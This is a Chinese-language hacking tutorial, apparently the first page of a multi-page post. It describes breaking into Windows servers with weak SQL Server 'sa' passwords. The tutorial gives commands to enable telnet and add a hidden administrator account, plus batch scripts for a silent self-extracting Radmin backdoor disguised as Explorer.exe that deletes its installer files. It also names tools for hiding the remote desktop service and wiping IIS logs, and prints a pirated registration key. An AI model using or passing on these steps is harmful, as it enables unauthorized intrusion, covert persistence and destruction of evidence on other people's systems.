这多是本人多年下来的经验。

工具:WINNTAutoAttack自动攻击器（扫漏洞）；SQLTOOLS（SA空口令连接器）；RAMDIN影子3.0中文版（远程控制程序）（RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）；SC.exe port.bat query.exe quser.exe（隐藏3389服务及不让管理发现自己程序）；CleanIISLog.exe（小榕的擦PP程序）；3389.exe（开3389端口服务的）；psu.exe（使用被禁止的Guest帐户要用到的）；mstsc.exe（远程桌面连接程序）。

一.扫到SA弱口令(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet                         开telnet服务 

net user mint mint /add                 添加用户mint密码为mint 

net localgroup administrators mint /add       将帐号mint升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe；

2、在本地设置服务端（一定要生成）；

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg；

4、编写一个批处理，并命名为u.bat；

@echo off
net stop r_server

5、写第二个批处理，r.bat,内容为：

@echo off
@Explorer.exe /uninstall /silence
@Explorer.exe /install /silence
@regedit /s 1.reg
@echo off
@Explorer.exe /uninstall /silence
@Explorer.exe /install /silence
@regedit /s 1.reg
@net start r_server
@del rad.exe
@del 1.reg
@del r.bat
@del u.bat

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包；

7、将Rad.rar制作成自解压文件；

选择Default.sfx的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%\\system32

安装程序:释放后运行:r.bat 释放前运行u.bat

-->>摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成。

[1] [2] [3] 下一页